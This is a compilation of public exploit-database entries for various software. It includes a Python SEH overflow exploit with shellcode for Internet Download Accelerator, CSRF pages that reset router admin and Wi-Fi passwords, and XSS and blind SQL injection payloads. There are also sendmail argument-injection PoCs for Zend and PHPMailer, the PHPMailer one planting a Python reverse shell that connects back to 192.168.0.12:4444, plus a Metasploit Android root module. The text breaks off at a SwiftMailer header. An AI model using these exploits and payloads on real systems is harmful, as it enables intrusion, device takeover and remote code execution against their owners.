#!/usr/bin/python
#
# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit.
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 2, 2017
# Vendor Homepage: http://westbyte.com/
# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator.
# Version: 6.10.1.1527
# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10.
# --------------
# Internet Download Accelerator suffers from a buffer overflow when an FTP download of a
# file with a long name fails.
# --------------
# To Exploit this issue:
# 1- Run an HTTP server that redirects to the FTP file with the long name.
# 2- The FTP server will answer the commands sent, then will open a data connection.
# 3- The script will send an empty file list and close the connection to trigger the BOF condition.
# 5- Happy new year :D.
import SocketServer
import threading
# Address all three listeners bind to. It is also spliced into the PASV reply
# below, which must carry a concrete host address, so a wildcard such as
# 0.0.0.0 cannot be used here.
ip = "192.168.1.100"
ipParts = ip.split(".")
# PASV reply "(h1,h2,h3,h4,p1,p2)": by the FTP convention the data port is
# p1*256 + p2, here 151*256 + 130 = 38786 -- the port the data-connection
# listener in __main__ binds to.
PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)"
# Raw machine code that HTTPHandler embeds in the redirect URL. The author
# states it launches calc.exe; that is not verifiable from this file.
buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
     "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
     "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
     "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
     "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
     "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
     "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
class HTTPHandler(SocketServer.BaseRequestHandler):
    """
    Request handler for the HTTP listener.

    Every connection, whatever it sends, is answered with a 302 redirect whose
    Location is an ftp:// URL carrying the overlong file name; the request is
    read but never parsed. The author's stated purpose is to avoid handing the
    target a suspicious-looking FTP link directly.
    """
    def handle(self):
        # self.request is the TCP socket connected to the client. The first
        # 1024 bytes are read only to drain the request; self.data is not used.
        self.data = self.request.recv(1024).strip()
        print "[*] Recieved HTTP Request"
        print "[*] Sending Redirction To FTP"
        # Redirect target: an ftp:// URL whose path is the crafted file name.
        # Author's layout note: SEH offset 336, 1056 bytes for the payload,
        # 0x10011b53 = ppr (pop/pop/ret) in unzip32.dll. The host in the URL
        # is a literal and is not derived from the `ip` setting above.
        payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf))
        # Minimal 302 response, sent regardless of the request method or path;
        # no body follows the blank line.
        self.request.sendall("HTTP/1.1 302 Found\r\n" +
                             "Host: Server\r\nConnection: close\r\nLocation: "+
                             payload+
                             "\r\nContent-type: text/html; charset=UTF-8\r\n\r\n")
        print "[*] Redirection Sent..."
class FTPHandler(SocketServer.BaseRequestHandler):
    """
    Request handler for the FTP control listener.

    Plays a fixed script of replies. Each recv() is assumed to be the next
    command in the sequence USER, PASS, SYST, TYPE, REST, CWD, PASV, LIST;
    nothing the client sends is checked, and any credentials are accepted.
    The PASV reply points the client at the data-connection listener started
    in __main__.
    """
    def handle(self):
        # Greeting, then USER: the value is only echoed to the console.
        self.request.sendall("220 Nasty FTP Server Ready\r\n")
        User = self.request.recv(1024).strip()
        print "[*] Recieved User Command: " + User
        self.request.sendall("331 User name okay, need password\r\n")
        # PASS: accepted unconditionally.
        Pass = self.request.recv(1024).strip()
        print "[*] Recieved PASS Command: " + Pass
        self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n")
        # SYST: claims to be a UNIX server.
        Syst = self.request.recv(1024).strip()
        print "[*] Recieved SYST Command: " + Syst
        self.request.sendall("215 UNIX Type: L8\r\n")
        # TYPE: acknowledged as binary whatever was requested.
        Type = self.request.recv(1024).strip()
        print "[*] Recieved Type Command: " + Type
        self.request.sendall("200 Type set to I\r\n")
        # REST: acknowledged without parsing the offset.
        Rest = self.request.recv(1024).strip()
        print "[*] Recieved Rest Command: " + Rest
        self.request.sendall("200 OK\r\n")
        # CWD: larger buffer than the other commands, presumably because the
        # client sends the long path from the redirect here -- TODO confirm.
        Cwd = self.request.recv(2048).strip()
        print "[*] Recieved CWD Command: " + Cwd
        self.request.sendall("250 CWD Command successful\r\n")
        # PASV: advertises the host/port pair built at module level.
        Pasv = self.request.recv(1024).strip()
        print "[*] Recieved PASV Command: " + Pasv
        self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n")
        # LIST: 150 and 226 are sent back-to-back on the control connection;
        # the listing itself is expected on the data connection.
        List = self.request.recv(1024).strip()
        print "[*] Recieved LIST Command: " + List
        self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n")
class FTPDataHandler(SocketServer.BaseRequestHandler):
    """
    Request handler for the FTP data connection.

    Sends a trivial directory listing and closes the socket; per the header,
    the client's handling of the failed download of the long-named file is
    what triggers the overflow. Note that __main__ as written binds the
    data-port listener to FTPHandler rather than to this class.
    """
    def handle(self):
        # self.request is the TCP socket connected to the client
        print "[*] Recieved FTP-Data Request"
        print "[*] Sending Empty List"
        # An essentially empty listing, followed by an explicit close.
        self.request.sendall("total 0\r\n\r\n")
        self.request.close()
if __name__ == "__main__":
    HOST, PORT = ip, 8000
    # Set on the TCPServer class itself, so it applies to all three listeners.
    SocketServer.TCPServer.allow_reuse_address = True
    print "[*] Starting the HTTP Server."
    # HTTP listener, bound to `ip` (not localhost) on port 8000.
    HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler)
    # Served from a daemon thread so the main thread can go on to start the
    # FTP listeners; daemon threads end with the main thread.
    HTTPThread = threading.Thread(target=HTTPServer.serve_forever)
    HTTPThread.daemon = True
    HTTPThread.start()
    print "[*] Starting the FTP Server."
    # FTP control listener on port 21.
    FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler)
    # Running the FTP server thread.
    FTPThread = threading.Thread(target=FTPServer.serve_forever)
    FTPThread.daemon = True
    FTPThread.start()
    print "[*] Opening the data connection."
    # Data-connection listener. 38786 is the port encoded in PasvResp
    # (151*256 + 130), so it cannot be changed here without changing that
    # reply too. NOTE(review): as written this listener is bound to
    # FTPHandler; the FTPDataHandler class above is not referenced anywhere.
    FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler)
    # Running the FTP Data connection Thread.
    DataThread = threading.Thread(target=FTPData.serve_forever)
    DataThread.daemon = True
    DataThread.start()
    print "[*] Listening for FTP Data."
    # Keep the main thread alive: raw_input() returns on a newline (the
    # "any key" message is approximate), after which the daemon threads end.
    print "[*] To exit the script please press any key at any time."
    raw_input()
Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
Credit: Felipe Soares de Souza
Date: 09/12/2016
Vendor: D-Link
Product: D-Link DI-524 Wireless 150
Product link: https://dlink.com.br/produto/di-524150
Version: Firmware 9.01
1- Reboot the device
<!-- CSRF PoC 1 (reboot): a hidden 1x1 iframe makes the victim's browser issue
     a GET to the router's cgi-bin/dial endpoint with the reboot parameters.
     Nothing in the request is per-session or per-user, which is exactly what
     a per-request anti-CSRF token or an Origin/Referer check would add. -->
<html>
<head>
<title>CSRF - Reboot the device</title>
</head>
<body>
<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
</body>
</html>
2- Change admin account
<!-- CSRF PoC 2 (change admin account): a hidden form carrying only rc, Pa and
     p1 (presumably the new password and its confirmation) is auto-submitted
     by the inline script as a POST to cgi-bin/pass. There is no token field,
     so the request does not depend on anything only the legitimate page could
     know. NOTE(review): this PoC posts to 192.168.1.1 while the reboot PoC
     uses 192.168.0.1; the device address is presumably deployment-specific. -->
<html>
<head>
<title>CSRF - Change admin account</title>
</head>
<body>
<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
<input type="hidden" name="rc" value="@atbox">
<input type="hidden" name="Pa" value="attacker">
<input type="hidden" name="p1" value="attacker">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>
# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T
# Date: 09/08/2016
# Exploit Author: Ayushman Dutta
# Version: dpc3941-P20-18-v303r20421733-160413a-CMCST
# CVE : CVE-2016-7454
The DPC3941T device is vulnerable to CSRF and has no protection against it
anywhere in the admin panel.
Some of the links are at:
<IP Address>/actionHandler/ajax_remote_management.php
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
<IP Address>/actionHandler/ajax_at_a_glance.php
A simple HTML page containing JavaScript, to which the attacker lures the victim,
can be used to change state in the application.
<!-- CSRF PoC (Xfinity DPC3941T, change Wi-Fi settings): on load, jsonreq()
     builds a form-encoded body "configInfo=<JSON>" holding the wireless
     settings, including network_name and network_password, and POSTs it to
     the gateway's ajaxSet_wireless_network_configuration_edit.php with
     withCredentials set so the browser attaches its existing session.
     Because the content type is application/x-www-form-urlencoded and no
     custom header is set, the browser sends this as a "simple" cross-origin
     request with no CORS preflight, and the response is never read, so CORS
     alone does not stop it; an anti-CSRF token or a required custom header
     would. NOTE(review): as printed here the URL string literal passed to
     open() is split across three lines, which is not valid JavaScript; in
     the original script it is presumably a single line. -->
<html>
<head>
<title>
Lets CSRF Xfinity to change Wifi Password
</title>
</head>
<script>
function jsonreq() {
    var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",
        "network_name":"MyName", "wireless_mode":"a,n,ac",
        "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true",
        "channel_number":"40", "network_password":"password",
        "broadcastSSID":"true", "enableWMM":"true", "ssid_number":"1"});
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.withCredentials = true;
    xmlhttp.open("POST","
http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php",
        true);
    xmlhttp.setRequestHeader("Content-Type",
        "application/x-www-form-urlencoded");
    xmlhttp.send(json_upload);
}
jsonreq();
</script>
</html>
Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF
Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/secure-mobile-access/
Affected version: 8.1 (SSL-VPN)
Summary: Keep up with the demands of today’s remote workforce. Enable secure
mobile access to critical apps and data without compromising security. Choose
from a variety of scalable secure mobile access (SMA) appliances and intuitive
Mobile Connect apps to fit every size business and budget.
Desc: SonicWALL SMA suffers from an XSS issue due to a failure to properly sanitize
user-supplied input to several parameters. Attackers can exploit this weakness
to execute arbitrary HTML and script code in a user's browser session. The WAF was
bypassed via form-based CSRF.
Tested on: SonicWALL SSL-VPN Web Server
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5392
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5392.php
Firmware fixed: 8.1.0.3
Issue ID: 172692
http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.3/release-notes/resolved-issues?ParentProduct=869
26.01.2016
--
Reflected XSS via protocol parameter (GET):
-------------------------------------------
https://127.0.0.1/cgi-bin/ftplauncher?protocol=sftp:</script><img%20src=a%20onerror=confirm(1)>&bmId=55
XSS via arbitrary parameter (GET):
----------------------------------
https://127.0.0.1/cgi-bin/handleWAFRedirect?hdl=VqjLncColvAAAF4QB2YAAAAT&<script>alert(2)</script>=zsl
XSS via REMOTEPATH parameter (GET):
-----------------------------------
https://127.0.0.1/cgi-bin/soniclauncher?REMOTEPATH=//servername/share/</script><img%20src=a%20onerror=confirm(3)>&bmId=59
WAF Cross-Site Request Forgery PoC:
-----------------------------------
POST /cgi-bin/editBookmark HTTP/1.1
Host: 127.0.0.1
bmName=%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2533%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%250a&host=2&description=3&tabs=4&service=HTTP&screenSize=4&screenSizeHtml5=4&colorSize=3&macAddr=&wolTime=90&apppath=&folder=&appcmdline=&tsfarmserverlist=&langsel=1&redirectclipboard=on&displayconnectionbar=on&autoreconnection=on&bitmapcache=on&themes=on&rdpCompression=on&audiomode=3&rdpExperience=1&rdpServerAuthFailAction=2&charset=UTF-8&sshKeyFile=&defaultWindowSize=1&kexAlgoList=0%2C1%2C2&cipherAlgoList=&hmacAlgoList=&citrixWindowSize=1&citrixWindowWidth=0&citrixWindowHeight=0&citrixWindowPercentage=0&citrixLaunchMethod=Auto&forceInstalledCheckbox=on&icaAddr=&vncEncoding=0&vncCompression=0&vncCursorShapeUpdates=0&vncUseCopyrect=on&vncRestrictedColors=on&vncShareDesktop=on&MC_App=inherit&MC_Copy=inherit&MC_Print=inherit&MC_Offline=inherit&name=1%22+javascript%3Aconfirm(251)%3B&type=user&owner=zslab&cmd=edit&parentBmId=0&ownerdomain=ZSLAB&serviceManualConfigList=undefined&wantBmData=true&swcctn=1NcP8JhUY10emue9YQpON1p2c%3D6P0c9P&ok=OK
<?php
/*
Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11
zend-mail < 2.7.2
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.

Reviewer notes: the sender address below reaches the Sendmail transport as
the -r (envelope sender) argument; the fixed zend-mail versions named above
are the ones in which it no longer reaches the command line unescaped. Any
address that ends up on an MTA command line should be validated against a
strict address grammar, with embedded whitespace and quotes rejected.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
// Single-quoted PHP string, so the backslashes are literal: the quoted local
// part is closed early and two sendmail options (-oQ queue directory, -X
// transfer-log path) are smuggled in ahead of the "@email.com" tail.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// Base64 of "<?php phpinfo(); ?>" (see the transfer-log excerpt in the header).
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
// ------------------
// mail() param injection via the vulnerability in zend-mail
// Meant to run from inside a ZF2 application: move to the application root
// (parent of this file's directory), register the autoloader and boot it.
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
Zend\Loader\AutoloaderFactory::factory(array(
    'Zend\Loader\StandardAutoloader' => array(
        'autoregister_zf' => true
    )
));
Zend\Mvc\Application::init(require 'config/application.php')->run();
// Build the message; the crafted address is used as the From address.
$message = new \Zend\Mail\Message();
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');
// The Sendmail transport invokes the local sendmail binary, which is where
// the injected options take effect.
$transport = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
?>
Dell SonicWALL Global Management System GMS 8.1 Blind SQL Injection
Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/sonicwall-gms/
Affected version: 8.1
8.0 SP1 Build 8048.1410
Flow Server Virtual Appliance
Fixed in: 8.2 (VR-2016-01-C0V)
Summary: Provide your organization, distributed enterprise or managed
service offering with an intuitive, powerful way to rapidly deploy and
centrally manage SonicWall solutions, with SonicWall GMS. Get more value
from your firewall, secure remote access, anti-spam, and backup and recovery
solutions with enhanced network security monitoring and robust network
security reporting. By deploying GMS in an enterprise, you can minimize
administrative overhead by streamlining security appliance deployment
and policy management.
Desc: Dell SonicWALL GMS suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameters 'searchBySonicwall', 'firstChangeOrderID',
'secondChangeOrderID' and 'coDomainID' is not properly sanitised before being
returned to the user or used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
Tested on: SonicWALL
MySQL/5.0.96-community-nt
Apache-Coyote/1.1
Apache Tomcat 6.0.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5388
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5388.php
Vendor: https://support.sonicwall.com/product-notification/215257?productName=SonicWALL%20GMS
26.01.2016
--
Blind SQL Injection via several parameters:
- searchBySonicwall (GET)
- coDomainID (GET)
- firstChangeOrderID (GET)
- secondChangeOrderID (GET)
PoC:
#1
GET /sgms/TaskViewServlet?page=taskView&level=1&node_id=null&screenid=15200&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null'%2b(select*from(select(sleep(6)))a)%2b' HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: http://127.0.0.1/sgms/content.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#2
GET /sgms/Logs?page=logView&searchByCO=Workflow%20Change%20Order%20Example&coDomainID=DMN0000000000000000000000001'%2b(select*from(select(sleep(6)))a)%2b'&level=1&node_id=null&screenid=15150&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: http://127.0.0.1/sgms/content.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#3
GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&secondChangeOrderID=CHO14520472477130040102377D2&_dc=1453805798333&node=root HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://127.0.0.1/sgms/viewdiff.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#4
GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2&secondChangeOrderID=CHO14520472477130040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&_dc=1453805798333&node=root HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://127.0.0.1/sgms/viewdiff.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
# Date: 30-12-2016
# Software Link: Premium plugin
# Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution
# Exploit Author: r3m1ck
# Website: https://www.r3m1ck.us/
# Category: webapps
# Google Dork: inurl:"wp-content/plugins/Tevolution/"
1. Description
WordPress Slider Templatic Tevolution <= 2.3.6 suffers from a file upload vulnerability.
Tevolution is not sold separately; it comes bundled with certain premium themes from Templatic.
2. Proof of Concept
curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
3. Uploaded file location:
Because the vulnerable plugin is bundled with some premium themes from Templatic, the upload location depends on the theme's name.
ex:
http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
  include Msf::Post::File
  include Msf::Post::Common

  # Module metadata. The module runs from an existing meterpreter session
  # (SessionTypes) on Android/Linux and defaults to a mettle reverse_tcp
  # payload; 'Space' => 2048 bounds the encoded payload that #exploit
  # patches into the prebuilt library.
  def initialize(info={})
    super( update_info( info, {
      'Name' => "Android get_user/put_user Exploit",
      'Description' => %q{
        This module exploits a missing check in the get_user and put_user API functions
        in the linux kernel before 3.5.5. The missing checks on these functions
        allow an unprivileged user to read and write kernel memory.
        This exploit first reads the kernel memory to identify the commit_creds and
        ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
        The exploit was first discovered in the wild in the vroot rooting application.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'fi01', # libget_user_exploit / libput_user_exploit
        'cubeundcube', # kallsyms_in_memory
        'timwr', # Metasploit module
      ],
      'References' =>
      [
        [ 'CVE', '2013-6282' ],
        [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ],
        [ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
        [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ],
      ],
      'DisclosureDate' => "Sep 06 2013",
      'SessionTypes' => [ 'meterpreter' ],
      "Platform" => [ "android", "linux" ],
      'Targets' => [[ 'Automatic', { }]],
      'Payload' => { 'Space' => 2048, },
      'DefaultOptions' =>
      {
        'WfsDelay' => 120,
        'PAYLOAD' => 'linux/armle/mettle/reverse_tcp',
      },
      'DefaultTarget' => 0,
    }
    ))
  end

  # Stages the prebuilt exploit library, loads it in the session process,
  # then removes it from disk. From a detection standpoint the observable
  # footprint is a short-lived file under a random 5-letter name in the
  # session's working directory that is written, loaded and deleted.
  def exploit
    # Prebuilt shared object shipped with the framework's data files, read
    # as binary.
    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" )
    exploit_data = File.read(local_file, {:mode => 'rb'})
    space = payload_space
    payload_encoded = payload.encoded
    # Substitute the exploit shellcode with our own: the library carries a
    # placeholder of 4 NOPs followed by (space - 4) zero bytes, which is
    # swapped for the encoded payload plus NOP padding.
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
    # Drop the patched library in the session's current directory and load
    # it from that path (UploadLibrary is false: the file written here is
    # used as-is rather than re-uploaded).
    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)
    print_status("Loading exploit library #{remote_file}")
    session.core.load_library(
      'LibraryFilePath' => local_file,
      'TargetFilePath' => remote_file,
      'UploadLibrary' => false,
      'Extension' => false,
      'SaveToDisk' => false
    )
    # The on-disk copy is removed immediately after loading; the payload is
    # then given WfsDelay seconds to connect back.
    print_status("Loaded library #{remote_file}, deleting")
    session.fs.file.rm(remote_file)
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end
end
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMailer with a back connection (reverse shell) from the target
Usage:
1 - Download the vulnerable docker environment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Configure your IP for the reverse shell in the payload variable
3 - Open an nc listener in one terminal: $ nc -lnvp <your ip>
4 - Open another terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64  # imported but not used in this script
from lxml import html as lh  # imported but not used in this script
# Clears the terminal through the shell before printing the banner.
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
# Target web root (the vulnerable contact form) and the path at which the
# injected sendmail -X transfer log is expected to appear.
target = 'http://localhost:8080'
backdoor = '/backdoor.php'
# PHP written into the log: it shells out to a python reverse shell that
# connects back to 192.168.0.12:4444 (the address the Usage notes say to edit).
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
# Form fields. 'email' carries the sendmail option injection
# (-OQueueDirectory=/tmp -X/www/backdoor.php) that PHPMailer < 5.2.18 passes
# through to the MTA command line; 'name' is presumably what ends up in the
# logged message body -- confirm against the target form.
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'message': 'Pwned'}
# Multipart body with a fixed boundary, mimicking a browser/curl upload.
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}
# Defined but never passed to requests.post/get below, so no proxy is used.
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
# First request submits the form; its response is discarded (r is rebound).
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
# Second request fetches the written file; success is judged only by a 200
# status, not by the listener actually receiving a connection.
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+] ExPLoITeD ' + target)
# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
# Date: 28-12-2016
# Software Link: http://awebsupport.com/products/aweb-cartwatching-system
# Exploit Author: Javi Espejo(qemm)
# Contact: http://twitter.com/javiespejo
# Website: http://raipson.com
# CVE: REQUESTED
# Category: webapps
1. Description
Any remote user can access the victim server through a blind SQL injection in a component of aweb_cartwatching_system and aweb_cart_autosave.
This is the code that has the unsanitized parameters:
2. Proof of Concept
option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.
3. Solution:
Update to version 2.6.1 from the update center of joomla.
The Joomla VEL published the vulnerability at the address below.
Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0
http://awebsupport.com/
<?php
/*
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
